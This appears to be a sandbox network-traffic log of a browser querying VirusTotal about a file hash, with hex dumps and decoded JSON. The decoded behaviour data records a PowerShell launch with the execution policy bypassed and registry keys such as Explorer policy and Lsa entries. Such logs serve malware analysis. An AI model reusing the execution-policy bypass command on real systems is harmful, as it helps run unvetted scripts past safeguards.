                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 5f 43 41 50 45 20 53 61 6e 64 62 6f 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox", "type": "file_behaviour", "links": { "self": "https://www.virustotal.com/ui/file_behaviour
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 69 63 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 53 65 63 75 72 69 74 79 48 65 61 6c 74 68 53 65 72 76 69 63 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 65 73 5f 63 72 65 61 74 65 64 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 6e 61 74 69 76 65 5c 5c 57 69 6e 64 6f 77 73 50 6f 77 65 72 53 68 65 6c 6c 5c 5c 76 31 2e 30 5c 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 5c 22 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 62 79 70 61 73 73 20 2d 46 69 6c 65 20 5c 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45
                                                                                                                                                                                                                    Data Ascii: ice", "SecurityHealthService" ], "processes_created": [ "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -ExecutionPolicy bypass -File \"C:\\Users\\<USE
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC546INData Raw: 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61 74 66 6f 72 6d 2d 63 68 61 6e 6e 65 6c 2d 68 61 6e 64 6c 65 3d 32 30 34 34 20 2d 2d 66 69 65 6c 64 2d 74 72 69 61 6c 2d 68 61 6e 64 6c 65 3d 31 39 32 30 2c 69 2c 38 32 34 39 31 33 34 39 39 36 32 33 34 32 35 35 30 35 39 2c 37 39 38 34 32 32 37 34 38 39 30 31 38 34 35 39 33 34 36 2c 32 36 32 31 34 34 20 2d 2d 76 61 72 69 61 74 69 6f 6e 73 2d 73 65 65 64 2d 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 34 30 39 2d 31 38 30 30 34 36 2e 31 38 33 30 30 30 20 2f 70 72 65 66 65 74 63 68 3a 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69
                                                                                                                                                                                                                    Data Ascii: o-appcompat-clear --mojo-platform-channel-handle=2044 --field-trial-handle=1920,i,8249134996234255059,7984227489018459346,262144 --variations-seed-version=20240409-180046.183000 /prefetch:3", "\"C:\\Program Files\\Google\\Chrome\\Appli
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 39 2d 31 38 30 30 34 36 2e 31 38 33 30 30 30 20 2f 70 72 65 66 65 74 63 68 3a 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 74 79 70 65 3d 75 74 69 6c 69 74 79 20 2d 2d 75 74 69 6c 69 74 79 2d 73 75 62 2d 74 79 70 65 3d 71 75 61 72 61 6e 74 69 6e 65 2e 6d 6f 6a 6f 6d 2e 51 75 61 72 61 6e 74 69 6e 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61 74 66 6f 72 6d 2d 63
                                                                                                                                                                                                                    Data Ascii: 9-180046.183000 /prefetch:8", "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-c
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 68 61 6e 64 6c 65 3d 35 33 30 34 20 2d 2d 66 69 65 6c 64 2d 74 72 69 61 6c 2d 68 61 6e 64 6c 65 3d 31 39 32 30 2c 69 2c 38 32 34 39 31 33 34 39 39 36 32 33 34 32 35 35 30 35 39 2c 37 39 38 34 32 32 37 34 38 39 30 31 38 34 35 39 33 34 36 2c 32 36 32 31 34 34 20 2d 2d 76 61 72 69 61 74 69 6f 6e 73 2d 73 65 65 64 2d 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 34 30 39 2d 31 38 30 30 34 36 2e 31 38 33 30 30 30 20 2f 70 72 65 66 65 74 63 68 3a 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 74 79 70 65 3d 75 74 69 6c 69 74 79 20 2d 2d 75 74 69 6c
                                                                                                                                                                                                                    Data Ascii: handle=5304 --field-trial-handle=1920,i,8249134996234255059,7984227489018459346,262144 --variations-seed-version=20240409-180046.183000 /prefetch:8", "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --util
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1280INData Raw: 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 74 65 6d 33 32 5c 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 4c 6f 63 61 6c 53 79 73 74 65 6d 4e 65 74 77 6f 72 6b 52 65 73 74 72 69 63 74 65 64 20 2d 70 20 2d 73 20 50 63 61 53 76 63 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 74 65 6d 33 32 5c 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 4c 6f 63 61 6c 53 79 73 74 65 6d 4e 65 74 77 6f 72 6b 52 65 73 74 72 69 63 74 65 64 20 2d 70 20 2d 73 20 4e 67 63 53 76 63 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 74 65 6d 33 32 5c 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 4c 6f 63 61 6c 53 65
                                                                                                                                                                                                                    Data Ascii: "C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc", "C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc", "C:\\Windows\\system32\\svchost.exe -k LocalSe
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 4e 6f 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 43 6c 61 73 73 65 73 5c 5c 43 4c 53 49 44 5c 5c 7b 35 39 30 33 31 61 34 37 2d 33 66 37 32 2d 34 34 61 37 2d 38 39 63 35 2d 35 35 39 35 66 65 36 62 33 30 65 65 7d 5c 5c 53 68 65 6c 6c 46 6f 6c 64 65 72 5c 5c 41 74 74 72 69 62 75 74 65 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f
                                                                                                                                                                                                                    Data Ascii: \\CurrentVersion\\Policies\\Explorer\\NoControlPanel", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\\ShellFolder\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windo
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 35 45 36 43 38 35 38 46 2d 30 45 32 32 2d 34 37 36 30 2d 39 41 46 45 2d 45 41 33 33 31 37 42 36 37 31 37 33 7d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 59 53 54 45 4d 5c 5c 43 6f 6e 74 72 6f 6c 53 65 74 30 30 31 5c 5c 43 6f 6e 74 72 6f 6c 5c 5c 4c 73 61 5c 5c 46
                                                                                                                                                                                                                    Data Ascii: icies\\Explorer", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{5E6C858F-0E22-4760-9AFE-EA3317B67173}", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\F
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1280INData Raw: 34 61 37 2d 38 39 63 35 2d 35 35 39 35 66 65 36 62 33 30 65 65 7d 5c 5c 53 68 65 6c 6c 46 6f 6c 64 65 72 5c 5c 43 61 6c 6c 46 6f 72 41 74 74 72 69 62 75 74 65 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 6f 66 74 77 61 72 65 5c 5c 43 6c 61 73 73 65 73 5c 5c 43 4c 53 49 44 5c 5c 7b 44 46 46 41 43 44 43 35 2d 36 37 39 46 2d 34 31 35 36 2d 38 39 34 37 2d 43 35 43 37 36 42 43 30 42 36 37 46 7d 5c 5c 49 6e 73 74 61 6e 63 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65
                                                                                                                                                                                                                    Data Ascii: 4a7-89c5-5595fe6b30ee}\\ShellFolder\\CallForAttributes", "HKEY_LOCAL_MACHINE\\Software\\Classes\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\Instance", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVe
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 77 6e 46 6f 6c 64 65 72 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 53 68 65 6c 6c 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 73 5c 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 55 73 65 72 73 46 69 6c
                                                                                                                                                                                                                    Data Ascii: wnFolders", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\powershell.exe", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UsersFil


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    161192.168.2.164991274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC568OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_domains HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 28c1c4e8feb875109f5d0f90054335d8
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    162192.168.2.164991374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC976OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/votes?relationships=item%2Cvoter HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTM1MzgwNzkyMTItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI5LjM5OQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: c995c5653e0916be85c58257994f769a
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 241
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC241INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 5d 2c 0a 20 20 20 20 22 6d 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 30 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 2f 76 6f 74 65 73 3f 6c 69 6d 69 74 3d 31 30 26 72 65 6c 61 74 69 6f 6e 73 68 69 70 73 3d 69 74 65 6d 25 32 43 76 6f 74 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": [], "meta": { "count": 0 }, "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/votes?limit=10&relationships=item%2Cvoter" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    163192.168.2.164991474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC564OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: c7299216bc952cdead5d94d6da06df89
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    164192.168.2.164991574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC980OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/comments?relationships=item%2Cauthor HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTE2OTE2MTYxMjQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI5LjM5OQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: ed8f49f9f7a4f6fe1eb304aa3bce6f01
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 245
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
